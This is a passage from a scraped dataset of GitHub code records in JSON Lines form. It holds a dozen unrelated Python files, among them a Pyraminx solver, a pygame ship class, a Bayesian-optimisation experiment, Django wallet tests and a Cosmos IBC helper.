if(eval('face')[0] is not eval('face')[i])])) == False and depth < 20:\r\n front, left, right, bottom = f[:], l[:], r[:], b[:]\r\n for i in moveSet:\r\n if i == 0:\r\n front[0], front[2], front[3], front[5], front[6], front[9], right[0], right[1], right[2], right[4], right[5], right[7], left[0], bottom[0] = right[7], right[4], right[1], right[5], right[2], right[0], front[9], front[3], front[6], front[2], front[5], front[0], bottom[0], left[0]\r\n elif i == 1:\r\n front[0], front[1], front[2], front[4], front[5], front[7], right[0], bottom[7], left[0], left[2], left[3], left[5], left[6], left[9] = left[9], left[3], left[6], left[2], left[5], left[0], bottom[7], right[0], front[7], front[4], front[1], front[5], front[2], front[0]\r\n elif i == 2:\r\n front[0], bottom[9], left[0], left[1], left[2], left[4], left[5], left[7], right[0], right[2], right[3], right[5], right[6], right[9] = bottom[9], front[0], right[9], right[3], right[6], right[2], right[5], right[0], left[7], left[4], left[1], left[5], left[2], left[0]\r\n elif i == 3:\r\n left[9], right[7], front[4], front[5], front[6], front[7], front[8], front[9], bottom[2], bottom[5], bottom[4], bottom[0], bottom[1], bottom[7] = right[7], left[9] , bottom[2], bottom[5], bottom[4], bottom[0], bottom[1], bottom[7], front[4], front[5], front[6], front[7], front[8], front[9]\r\n elif i == 4:\r\n front[7], right[9], left[4], left[5], left[6], left[7], left[8], left[9], bottom[4], bottom[5], bottom[6], bottom[7], bottom[8], bottom[9] = right[9], front[7], bottom[4], bottom[5], bottom[6], bottom[7], bottom[8], bottom[9], left[4], left[5], left[6], left[7], left[8], left[9]\r\n elif i == 5:\r\n front[9], left[7], right[4], right[5], right[6], right[7], right[8], right[9], bottom[6], bottom[5], bottom[2], bottom[9], bottom[3], bottom[0] = left[7], front[9], bottom[6], bottom[5], bottom[2], bottom[9], bottom[3], bottom[0], right[4], right[5], right[6], right[7], right[8], right[9]\r\n if (all([False for face in [front, left, right, bottom] for i in range(len(eval('face'))) if(eval('face')[0] is not eval('face')[i])])) == False:\r\n incMoveSet()\r\n while(isRedundant() == True):\r\n incMoveSet()\r\n\r\nprint(moveSet)\r\n","repo_name":"harikmr2795/Pyraminx-Solver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10350954795","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 21 14:18:44 2017\r\n\r\n@author: yjl20\r\n\"\"\"\r\n\r\n#modules importation\r\nfrom fingerprints import fingerprinter\r\nimport pandas as pd \r\nimport os\r\nimport random as rnd\r\n\r\n#fingerprints stored in a csv file importation\r\nfingerprints_audios = pd.read_csv('audios_fingerprints.csv' , sep = ';' , header = 0)\r\n\r\n#importation of the all testing files\r\ndef import_audios(path_files):\r\n list_audios = []\r\n for file in os.listdir(path_files):\r\n audio = path_files + \"/\" + file\r\n list_audios.append(audio)\r\n return list_audios\r\n\r\n#camparison of the fingerprints\r\ndef comparison_audios(audios , numbcomaprison , file_fingerprints , name_column = 'fingerprints'):\r\n number_audios = len(audios)\r\n \r\n #randomly choose file to compare\r\n indexes = [rnd.randint(0,number_audios) for k in range(numbcomaprison)]\r\n list_output = []\r\n for index in indexes:\r\n choosen_audio = audios[index]\r\n for fingerprint in file_fingerprints[name_column]:\r\n if fingerprinter(choosen_audio) == fingerprint:\r\n temp_file = choosen_audio.split(\"/\")\r\n list_output.extend([[temp_file[3] , fingerprinter(choosen_audio) , fingerprint]])\r\n #storage as dataframe for a better view\r\n comparison = pd.DataFrame(list_output) \r\n comparison.columns = ['name_audio' , 'fingerprint_genereated' , 'fingerprint_stored_file'] \r\n print(comparison)\r\n \r\n\r\n\r\npath_audios = 'genres/genres_converted/test_files'\r\n\r\nlist_audios = import_audios(path_audios)\r\nexp = comparison_audios(list_audios , 5 , fingerprints_audios)\r\n\r\n\r\n \r\n \r\n\r\n\r\n","repo_name":"plejeail/Python_Music_Recommender","sub_path":"package/tools/recognize.py","file_name":"recognize.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"41441310365","text":"import os\n\ndef findWord():\n s = ''\n while (True):\n n = 0\n list = os.listdir()\n \n print('-------------------------------------')\n print(\"@ Write the string you are looking for\")\n print(\"@ Or write Q to quit\\n\")\n s = input().lower()\n print('')\n \n if (s == 'q' or s=='Q'):\n break;\n \n elif (s.strip() == ''): \n print('@ Please write a valid string!\\n')\n pass\n else:\n for el in list:\n if (el != \"@ find word.py\"):\n if s in open(el).read().lower() or s in el.lower():\n print(el)\n n += 1\n print('\\n@ The operation has been done successfully!')\n print('@ '+str(n)+' files contain the string.\\n')\n \nif __name__==\"__main__\":\n print('=== find word ===\\n\\n')\n findWord()\n","repo_name":"fabiomarigo7/python-tools","sub_path":"find_word.py","file_name":"find_word.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72614349642","text":"import pygame\r\n\r\nclass Ship():\r\n\r\n def __init__(self, ai_settings, screen):\r\n \"\"\"Initialize the chip and setting the chip\"\"\"\r\n self.screen = screen\r\n self.ai_settings = ai_settings\r\n\r\n # load the image of the chip and achieve its frame rectangle\r\n self.image = pygame.image.load('images/ship.png')\r\n self.rect = self.image.get_rect()\r\n self.screen_rect = screen.get_rect()\r\n\r\n # place every new ship in the center of the screen bottom\r\n self.rect.centerx = self.screen_rect.centerx\r\n self.rect.bottom = self.screen_rect.bottom\r\n\r\n # store decimal in center attribute\r\n self.center = float(self.rect.centerx)\r\n\r\n # Moving sign\r\n self.moving_right = False\r\n self.moving_left = False\r\n\r\n def update(self):\r\n \"\"\" update the position of the ship\"\"\"\r\n if self.moving_right and self.rect.right < self.screen_rect.right:\r\n self.center += self.ai_settings.ship_speed_factor\r\n if self.moving_left and self.rect.left > 0:\r\n self.center -= self.ai_settings.ship_speed_factor\r\n\r\n # update the rect according self.center\r\n self.rect.centerx = self.center\r\n\r\n def blitme(self):\r\n \"\"\"draw the ship on the right position\"\"\"\r\n self.screen.blit(self.image, self.rect)\r\n","repo_name":"song100/learn_python","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28981160423","text":"import numpy as np\nfrom cliport.tasks.task import Task\nfrom cliport.utils import utils\nimport random\nimport pybullet as p\nimport os\nimport copy\n\nclass CodeStackWall(Task):\n \"\"\"Arrange a cylinder in a zone marked by a green box on the tabletop.\"\"\"\n def __init__(self):\n super().__init__()\n self.max_steps = 20\n self.lang_template = \"Build a wall by stacking three symmetric blocks on top of each other. The blocks should be placed in a row, with each block touching the previous and next one.\"\n self.task_completed_desc = \"done building the wall.\"\n self.additional_reset()\n\n def reset(self, env):\n super().reset(env)\n\n # Add base.\n base_size = (0.15, 0.15, 0.01)\n base_urdf = 'box/box-template.urdf'\n base_pose = self.get_random_pose(env, base_size)\n env.add_object(base_urdf, base_pose, category='fixed')\n\n # Add blocks.\n block_size = (0.04, 0.04, 0.04)\n block_urdf = 'block/block.urdf'\n block_color = utils.COLORS['red']\n blocks = []\n for _ in range(3):\n block_pose = self.get_random_pose(env, block_size)\n block_id = env.add_object(block_urdf, block_pose, color=block_color)\n blocks.append(block_id)\n\n # Calculate target poses.\n target_poses = []\n for i in range(3):\n target_pose = ((0.5, 0.0, 0.005), (0, 0, 0, 1))\n target_poses.append(target_pose)\n\n # Add goals.\n for i in range(3):\n self.add_goal(objs=[blocks[i]], matches=np.ones((1, 1)), targ_poses=[target_poses[i]], replace=False,\n rotations=True, metric='pose', params=None, step_max_reward=1 / 3,\n language_goal=self.lang_template)","repo_name":"liruiw/GenSim","sub_path":"cliport/generated_tasks/code_stack_wall.py","file_name":"code_stack_wall.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"63"} +{"seq_id":"46855470827","text":"import pymongo\nimport ssl\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n# create a mongo client\nclient = pymongo.MongoClient( os.environ.get('MONGO_URI'),\n ssl_cert_reqs=ssl.CERT_NONE) # create an instance of MongoClient from the pymongo package \n # and store it in the `client` variable\n\n# retrive a database\ndb = client[\"sample_airbnb\"]\n\nlistings = db.listingsAndReviews.find({\n \"beds\": {\n \"$gte\": 3\n }, \n}, {\n \"name\": 1,\n \"beds\": 1\n}).limit(10)\n\nprint(listings)\nfor l in listings:\n print(l)","repo_name":"kunxin-chor/jes-mongo-flask","sub_path":"01-basic/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11069400150","text":"from itertools import permutations\ndef solution(k, dungeons):\n answer = 0\n poss = permutations(dungeons)\n for p in poss:\n tmp = 0\n health = k\n for i in p:\n if i[0]<= health:\n health -= i[1]\n tmp += 1\n if answer < tmp:\n answer = tmp\n return answer","repo_name":"lawkelvin33/swmaestro_ct","sub_path":"87946_bf.py","file_name":"87946_bf.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39686454047","text":"# =============================================================================\n# IMPORTS\n# =============================================================================\nimport torch\nimport abc\nimport dgl\nimport copy\nimport pinot\nfrom pinot.metrics import _independent\n\n# =============================================================================\n# HELPER FUNCTIONS\n# =============================================================================\ndef _slice_fn_tensor(x, idxs):\n \"\"\" Slice function for tensors.\n\n Parameters\n ----------\n x : `torch.Tensor`, `shape=(n_data, )`\n Input tensor.\n\n idxs : `List` of `int`\n Indices to be taken.\n\n Returns\n -------\n x : `torch.Tensor`, `shape=(n_data_chosen, )`\n Output tensor.\n \"\"\"\n return x[idxs]\n\n\ndef _slice_fn_tensor_pair(x, idxs):\n \"\"\" Slice function for tensors.\n\n Parameters\n ----------\n x : `torch.Tensor`, `shape=(n_data, )`\n Input tensor.\n\n idxs : `List` of `int`\n Indices to be taken.\n\n Returns\n -------\n x : `torch.Tensor`, `shape=(n_data_chosen, )`\n Output tensor.\n \"\"\"\n return x[0][idxs], x[1][idxs]\n\n\ndef _collate_fn_tensor(x):\n \"\"\" Collate function for tensors.\n\n Parameters\n ----------\n x : `List` of `torch.Tensor`\n Tensors to be stacked.\n\n Returns\n -------\n x : `torch.Tensor`\n Output tensor.\n \"\"\"\n return torch.stack(x)\n\n\ndef _collate_fn_graph(x):\n \"\"\" Collate function for graphs.\n\n Parameters\n ----------\n x : `List` of `dgl.DGLGraph`\n Input list of graphs to be batched.\n\n Returns\n -------\n x : `dgl.DGLGraph`\n \"\"\"\n return dgl.batch(x)\n\n\ndef _slice_fn_graph(x, idxs):\n \"\"\" Slice function for graphs.\n\n Parameters\n ----------\n x : `dgl.DGLGraph`\n Batched graph.\n\n idxs : `List` of `int`\n Indices of the chosen graphs.\n\n Returns\n -------\n x : `dgl.DGLGraph`\n Sliced graph.\n \"\"\"\n if x.batch_size > 1:\n x = dgl.unbatch(x)\n else:\n raise RuntimeError(\"Can only slice if there is more than one.\")\n\n return dgl.batch([x[idx] for idx in idxs])\n\n\ndef _slice_fn_tuple(x, idxs):\n \"\"\" Slice function for tuples.\n\n Parameters\n ----------\n x : `List` of `tuple`\n Input data pairs.\n\n idxs : `List` of `int`\n Indices of chosen data points.\n\n Returns\n -------\n `graph_slices` : `dgl.DGLGraph`\n Sliced and batched graph.\n\n `tensor_slices` : `torch.Tensor`\n Sliced and stacked tensor.\n \"\"\"\n gs, ys = x\n graph_slices = _slice_fn_graph(gs, idxs)\n tensor_slices = _slice_fn_tensor(ys, idxs)\n return graph_slices, tensor_slices\n\n\n# =============================================================================\n# MODULE CLASSES\n# =============================================================================\nclass ActiveLearningExperiment(torch.nn.Module, abc.ABC):\n \"\"\"Implements active learning experiment base class.\"\"\"\n\n def __init__(self):\n super(ActiveLearningExperiment, self).__init__()\n\n @abc.abstractmethod\n def train(self, *args, **kwargs):\n \"\"\" Train the model. \"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def acquire(self, *args, **kwargs):\n \"\"\" Acquire new data points from pool or space. \"\"\"\n raise NotImplementedError\n\n\nclass BayesOptExperiment(ActiveLearningExperiment):\n \"\"\"Implements active learning experiment with single task target.\n\n Parameters\n ----------\n net : `pinot.Net`\n Forward pass model that combines representation and output regression\n and generates predictive distribution.\n\n data : `List` of `tuple` of `(dgl.DGLGraph, torch.Tensor)`\n or `pinot.data.dataset.Dataset`\n Pairs of graph, measurement.\n\n acquisition : `callable`\n Acquisition function that takes the graphs of candidates and\n provides scores.\n\n optimizer : `torch.optim.Optimizer` or `pinot.Sampler`\n Optimizer for training.\n\n n_epochs : `int`\n Number of epochs.\n\n q : `int`\n Number of acquired candidates in each round.\n\n early_stopping : `bool`\n Whether the search ends when the best within the candidate pool\n is already acquired.\n\n workup : `callable` (default `_independent`)\n Post-processing predictive distribution.\n\n slice_fn : `callable` (default `_slice_fn_tensor`)\n Function used to slice data.\n\n collate_fn : `callable` (default `_collate_fn_tensor`)\n Function used to stack or batch input.\n\n\n Methods\n -------\n reset_net : Reset the states of `net`.\n\n blind_pick : Pick random candidates to start acquiring.\n\n train : Train the model for some epochs in one round.\n\n acquire : Acquire candidates from pool.\n\n run : Conduct rounds of acquisition and train.\n\n \"\"\"\n\n def __init__(\n self,\n net,\n data,\n acquisition,\n optimizer,\n num_epochs=100,\n q=1,\n num_samples=1000,\n early_stopping=True,\n workup=_independent,\n slice_fn=_slice_fn_tensor,\n collate_fn=_collate_fn_tensor,\n net_state_dict=None,\n train_class=pinot.app.experiment.Train,\n ):\n\n super(BayesOptExperiment, self).__init__()\n\n # model\n self.net = net\n self.optimizer = optimizer\n self.num_epochs = num_epochs\n\n # data\n self.data = data\n self.seen = []\n if isinstance(data, tuple):\n self.unseen = list(range(len(data[1])))\n self.g_all = data[0]\n else:\n self.unseen = list(range(len(data)))\n # If the data is DGLGraph\n if type(data[0][0]) == dgl.DGLGraph:\n self.g_all = dgl.batch([g for (g, y) in data])\n # If numerical data\n else:\n self.g_all = torch.tensor([g for (g,y) in data])\n\n # acquisition\n self.acquisition = acquisition\n self.q = q\n\n # early stopping\n self.early_stopping = early_stopping\n self.best_possible = torch.max(self.data[1])\n\n # bookkeeping\n self.workup = workup\n self.slice_fn = slice_fn\n self.collate_fn = collate_fn\n self.net_state_dict = net_state_dict\n self.train_class = train_class\n self.states = {}\n self.acquisitions = []\n\n def reset_net(self):\n \"\"\"Reset everything.\"\"\"\n # TODO:\n # reset optimizer too\n (p.reset_parameters() for _, p in self.net.named_children())\n\n if self.net_state_dict is not None:\n self.net.load_state_dict(self.net_state_dict)\n\n def blind_pick(self, seed=2666):\n \"\"\" Randomly pick index from the candidate pool.\n\n Parameters\n ----------\n seed : `int`\n (Default value = 2666)\n Random seed.\n\n Returns\n -------\n best : `int`\n The chosen candidate to start.\n\n Note\n ----\n Random seed set to `2666`, the title of the single greatest novel in\n human literary history by Roberto Bolano.\n This needs to be set to `None`\n if parallel experiments were to be performed.\n\n \"\"\"\n import random\n random.seed(seed)\n best = random.choice(self.unseen)\n self.seen.append(self.unseen.pop(best))\n return best\n\n def train(self):\n \"\"\"Train the model with new data.\"\"\"\n # reset\n self.reset_net()\n\n # set to train status\n self.net.train()\n\n # train the model\n self.net = self.train_class(\n data=[self.seen_data],\n optimizer=self.optimizer(self.net),\n n_epochs=self.num_epochs,\n net=self.net,\n record_interval=999999,\n ).train()\n\n\n def acquire(self):\n \"\"\"Acquire new training data.\"\"\"\n # set net to eval\n self.net.eval()\n\n # split input target\n gs, ys = self.unseen_data\n\n # acquire no more points than are remaining\n if self.q <= len(self.unseen):\n\n # acquire pending points\n pending_pts = self.acquisition(\n self.net, gs, q=self.q, y_best=self.y_best\n )\n \n # pop from the back so you don't disrupt the order\n pending_pts = pending_pts.sort(descending=True).values\n\n else:\n\n # set pending points to all remaining data\n pending_pts = torch.range(len(self.unseen)-1, 0, step=-1).long()\n\n self.seen.extend([self.unseen.pop(p) for p in pending_pts])\n\n\n def update_data(self):\n \"\"\"Update the internal data using old and new.\"\"\"\n if len(self.unseen):\n # grab new data\n self.unseen_data = self.slice_fn(self.data, self.unseen)\n else:\n self.unseen_data = tuple()\n\n # grab old data\n self.seen_data = self.slice_fn(self.data, self.seen)\n\n # set y_max\n gs, ys = self.seen_data\n\n self.y_best = torch.max(ys)\n\n\n def run(self, num_rounds=999999, seed=None):\n \"\"\"Run the model and conduct rounds of acquisition and training.\n\n Parameters\n ----------\n num_rounds : `int`\n (Default value = 999999)\n Number of rounds.\n\n seed : `int` or `None`\n (Default value = None)\n Random seed.\n\n Returns\n -------\n self.old : Resulting indices of acquired candidates.\n\n \"\"\"\n idx = 0\n self.blind_pick(seed=seed)\n self.update_data()\n\n while idx < num_rounds:\n \n if self.early_stopping and self.y_best == self.best_possible:\n break\n\n self.train()\n self.states[idx] = copy.deepcopy(self.net.state_dict())\n self.acquisitions.append(\n tuple([self.seen.copy(), self.unseen.copy()])\n )\n\n if not self.unseen:\n break\n\n self.acquire()\n self.update_data()\n\n idx += 1\n\n return self.acquisitions\n\n\nclass SemiSupervisedBayesOptExperiment(BayesOptExperiment):\n \"\"\"Implements active learning experiment with single task target\n with Semi Supervised model.\"\"\"\n\n def __init__(self, unlabeled_data=None, *args, **kwargs):\n \n super(SemiSupervisedBayesOptExperiment, self).__init__(*args, **kwargs)\n self.unlabeled_data = unlabeled_data\n\n def train(self):\n \"\"\"Train the model with new data.\"\"\"\n # combine new (unlabeled!) and old (labeled!)\n # Flatten the labeled_data and remove labels to be ready\n semi_supervised_data = pinot.data.utils.prepare_semi_supervised_data(\n self.flatten_data(self.unseen_data),\n self.flatten_data(self.seen_data),\n )\n \n # Combine this also with the background unlabeled data (if any)\n if self.unlabeled_data:\n semi_supervised_data = pinot.data.utils.prepare_semi_supervised_data(\n self.unlabeled_data, semi_supervised_data\n )\n\n batched_semi_supervised_data = pinot.data.utils.batch(\n semi_supervised_data, batch_size=len(semi_supervised_data)\n )\n\n # reset\n self.reset_net()\n\n # Compute the unsupervised scaling constant and reset it\n # as the number of labeled data points change after every epoch\n if self.unlabeled_data:\n unsup_scale = float(len(self.seen_data))/(len(self.unseen_data) + len(self.unlabeled_data))\n else:\n unsup_scale = float(len(self.seen_data))/len(self.unseen_data)\n \n # Update the unsupervised scale constant of SemiSupervisedNet\n self.net.unsup_scale = unsup_scale\n\n # set to train status\n self.net.train()\n\n # train the model\n self.net = pinot.app.experiment.Train(\n data=batched_semi_supervised_data,\n optimizer=self.optimizer,\n n_epochs=self.n_epochs,\n net=self.net,\n record_interval=999999,\n ).train()\n\n def flatten_data(self, data):\n \"\"\"\n\n Parameters\n ----------\n data :\n\n\n Returns\n -------\n\n \"\"\"\n gs, ys = data\n # if gs.batch_size > 1:\n gs = dgl.unbatch(gs)\n ys = list(torch.unbind(ys))\n\n flattened_data = list(zip(gs, ys))\n return flattened_data","repo_name":"choderalab/pinot","sub_path":"pinot/active/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":12439,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"63"} +{"seq_id":"9922752525","text":"from far3.far3cffi import ffi, ffic\nfrom far3 import pluginmanager\nfrom far3 import fardialogbuilder as dlgb\n\nimport os\ncwd = os.getcwd().encode('ascii')\nfcwd = ffi.new(\"char []\", cwd)\n\npluginmanager.PySetup(fcwd)\n\ndef s2f(s):\n return ffi.new(\"wchar_t []\", s)\n\ndef f2s(s):\n return ffi.string(ffi.cast(\"wchar_t *\", s))\n\nclass Info:\n def Message(self, guid1, guid2, Flags, HelpTopic, Items, ItemsNumber, ButtonsNumber):\n print('Message', guid1, guid2, Flags, HelpTopic, Items, ItemsNumber, ButtonsNumber\n )\n return 0\n\n def SendDlgMessage(self, hdlg, cmd, p1, p2):\n print('SendDlgMessage', hdlg, cmd, p1, p2)\n s = s2f('result abc')\n return s\n\n def DialogInit(self, guid1, guid2, x1, y1, x2, y2, HelpTopic, Item, ItemsNumber, Reserved, Flags, DlgProc, Param):\n print('DialogInit', guid1, guid2, x1, y1, x2, y2, HelpTopic, Item, ItemsNumber, Reserved, Flags, DlgProc, Param\n )\n return 12345678\n\n def DialogRun(self, hDlg):\n print('DialogRun', hDlg)\n return 0\n\n def DialogFree(self, hDlg):\n print('DialogFree', hDlg)\n\ndef main():\n info = Info()\n from far3 import upythonconfig\n cls = upythonconfig.Plugin(info)\n #cls.OpenW(None)\n\n @ffi.callback(\"FARWINDOWPROC\")\n def DialogProc(hDlg, Msg, Param1, Param2):\n return self.info.DefDlgProc(hDlg, Msg, Param1, Param2)\n\n # { DI_DOUBLEBOX, L-2,1, E+2,2+H, 0, nullptr,nullptr, 0, title.c_str() },\n b = dlgb.DialogBuilder(\n cls,\n DialogProc,\n \"Python path\",\n \"pythonpath\",\n 0,\n dlgb.VSizer(\n dlgb.HSizer(\n dlgb.TEXT(text=\"Python path:\"),\n dlgb.EDIT(\"path\", width=60, maxlength=120)\n ),\n dlgb.HSizer(\n dlgb.BUTTON('vok', text=\"OK\", flags=ffic.DIF_DEFAULTBUTTON|ffic.DIF_CENTERGROUP),\n dlgb.BUTTON('vcancel', text=\"Cancel\", flags=ffic.DIF_CENTERGROUP),\n ),\n ),\n )\n\n dlg = b.build(-1, -1)\n dlg.SetText(dlg.ID_path, 'abc')\n res = dlg.Info.DialogRun(dlg.hDlg)\n path = dlg.GetText(dlg.ID_path)\n print('DialogRun={}, path={}'.format(res, path))\n dlg.close()\nmain()\n","repo_name":"m32/far3python","sub_path":"t-dialog.py","file_name":"t-dialog.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"20056485624","text":"import requests\n\nisbn_repo = open(\"ISBN.txt\")\nisbn_numbers = isbn_repo.readlines()\nnew_archive = open(\"ISBN_TITLE.txt\", \"a\")\n\nfor isbn in isbn_numbers:\n request = requests.get(f\"https://openlibrary.org/isbn/{isbn.strip()}.json\")\n isbn_data = request.json()\n\n new_archive.write(f\"ISBN nº {isbn} {isbn_data['title']}\\n\")\n","repo_name":"vmpires/Python_API","sub_path":"17) ISBN API 2.py","file_name":"17) ISBN API 2.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"69918758921","text":"# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\n\nfrom datetime import time,datetime\nfrom estacionamientos.controller import consumir_saldo\nfrom estacionamientos.models import (\n Usuario,\n Billetera\n )\n\n###################################################################\n# ESTACIONAMIENTO VISTA DISPONIBLE #\n###################################################################\n\nclass consumirSaldoTestCase(TestCase):\n\n\tdef crear_usuario(self):\n\t\tusuario = Usuario(\n\t\t\tnombre = \"nom\",\n\t\t\tapellido = \"apell\",\n\t\t\tcedula = \"2345678\",\n\t\t\t)\n\t\tusuario.save()\n\t\treturn usuario\n\n\tdef crear_billetera(self):\n\t\tbilletera = Billetera(\n\t\t\tusuario = self.crear_usuario(),\n\t\t\tsaldo = 1000.00,\n\t\t\tpin = '1234ab'\n\t\t)\n\t\tbilletera.save()\n\t\treturn billetera\n\n\t# TDD\n\tdef test_consumirSaldo_MontoConsumoSinDecimales(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 15)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertTrue(consumo)\n\t\tself.assertEqual(saldo, b.saldo-15)\n\n\t# Borde\n\tdef test_consumirSaldo_MontoConsumoIgualASaldo(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 1000)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertTrue(consumo)\n\n\t# TDD\n\tdef test_consumirSaldo_MontoConsumoUnDecimal(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 15.30)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertTrue(consumo)\n\n\t# TDD\n\tdef test_consumirSaldo_MontoConsumoDosDecimales(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 65.18)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertTrue(consumo)\n\n\t# Malicia\n\tdef test_consumirSaldo_MontoConsumoTresDecimales(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 9.876)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertTrue(consumo)\n\n\t# Malicia\n\tdef test_consumirSaldo_MontoConsumoMayorASaldo(self):\n\t\tb = self.crear_billetera()\n\t\tconsumo = consumir_saldo(b.id, '1234ab', 1000.01)\n\t\tb_aux = Billetera.objects.get(id = b.id)\n\t\tsaldo = b_aux.saldo\n\t\tself.assertEqual(saldo, float(consumo))\n\n\t# Malicia\n\tdef test_consumirSaldo_billeteraInexistente(self):\n\t\tconsumo = consumir_saldo(0, '1234ab', 15.00)\n\t\tself.assertFalse(consumo)\n\n\t# Malicia\n\tdef test_consumirSaldo_PinIncorrecto(self):\n\t\tconsumo = consumir_saldo(0, '2241', 15.00)\n\t\tself.assertFalse(consumo)","repo_name":"fabiocasmar/ingenieria-de-software-1","sub_path":"tests/test_consumir_saldo.py","file_name":"test_consumir_saldo.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"8811529820","text":"import sys\n\n\"\"\"\nThis will install the required python libraries if they are not alreaady installed.\n\"\"\"\n\n\ndef install_package(package_name):\n try:\n __import__, package_name\n except ImportError:\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", package_name])\n finally:\n try:\n __import__, package_name\n except ImportError:\n subprocess.check_call([sys.executable, \"-m\", \"pip3\", \"install\", package_name])\n finally:\n __import__, package_name\n\n\ninstall_package(\"requests\")\ninstall_package(\"datadog-api-client\")\n\n\"\"\"\nimport the rest of our libraries needed for the sdk.\n\"\"\"\nimport logging\nimport json\nimport subprocess\nimport requests\nfrom datadog_api_client.v2 import ApiClient, ApiException, Configuration\nfrom datadog_api_client.v2.api import logs_api\nfrom datadog_api_client.v2.models import *\n\n\nclass CosmosIBC:\n def __init__(self, binary_name, rpc_node, api_node):\n self.binary_name = binary_name\n self.rpc_node = rpc_node\n self.api_node = api_node\n self.go_bin_folder = \"~/go/bin\"\n self.destination_channel = \"\"\n self.source_channel = \"\"\n formatter_normal = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n streamHandler = logging.StreamHandler(sys.stdout)\n streamHandler.setFormatter(formatter_normal)\n self.logger = logging.getLogger('logger')\n self.logger.addHandler(streamHandler)\n self.logger.setLevel(logging.INFO)\n\n \"\"\"\n Description:\n This method will execute a cli command and set the go path.\n arg1: command\n arg2: go path\n \"\"\"\n\n def cli_command(self, command, gopath):\n command_eddition = \"export PATH={go_path}:$PATH &&\".format(go_path=gopath)\n command = command_eddition + command\n result = subprocess.run(command, stdout=subprocess.PIPE, shell=True)\n result = result.stdout.decode('utf-8')\n return result\n\n \"\"\"\n Description:\n This method will execute an api quest with the api set as self.api_node. This will return a json/python \n object of the data returned by api\n arg1: api /node_info path you want to use.\n \"\"\"\n\n def api_request(self, api_path):\n connection_url = \"{api_url}{api_path}\".format(api_url=self.api_node, api_path=api_path)\n try:\n request = requests.get(connection_url)\n except Exception as e:\n self.log_it(str(e))\n return None\n\n if request.status_code == 200 or request.status_code == 201:\n request_data_object = request.json()\n return request_data_object\n else:\n self.log_it(request.status_code)\n self.log_it(request.content)\n return None\n\n \"\"\"\n Description:\n This method will execute a cosmosation api request with the api to get transaction details.\n object of the data returned by api\n arg1: api /node_info path you want to use.\n \"\"\"\n\n def cosmosation_api_request(self, api_path):\n connection_url = \"{api_url}{api_path}\".format(api_url=self.cosmosation_api, api_path=api_path)\n try:\n request = requests.get(connection_url)\n except Exception as e:\n self.log_it(str(e))\n return None\n\n if request.status_code == 200 or request.status_code == 201:\n request_data_object = request.json()\n return request_data_object\n else:\n self.log_it(request.status_code)\n self.log_it(request.content)\n return None\n\n \"\"\"\n Description:\n This method will send a message to a slack webhook channel.\n arg1: message: the message you want to send to the channel.\n arg2: the webhook channel you want to send message to.\n \"\"\"\n\n def send_slack_message(self, message, ibc_alert_channel_webhook):\n slack_post_requests = requests.post(ibc_alert_channel_webhook, headers={\"Content-type\": \"application/json\"},\n json=message)\n return slack_post_requests.status_code, slack_post_requests.text\n\n \"\"\"\n Description:\n This method will use the class logger object to log the message passed.\n arg1: message: the message you want to log using the logger.\n \"\"\"\n\n def log_it(self, message):\n self.logger.info(str(message))\n\n \"\"\"\n Description:\n This method uses the api to check the account balance for a passed account.\n arg1: account: the account you want to check the balance of.\n \"\"\"\n\n def check_account_balance(self, account):\n try:\n account_balance = 0\n check_api_status_request = requests.get(self.api_node + \"/node_info\").json()\n if check_api_status_request:\n if account:\n query_balance = requests.get(self.api_node + \"/cosmos/bank/v1beta1/balances/\" + account)\n if query_balance.status_code == 200 or query_balance.status_code == 201:\n query_balance_json = query_balance.json()\n if \"balances\" in query_balance_json:\n if 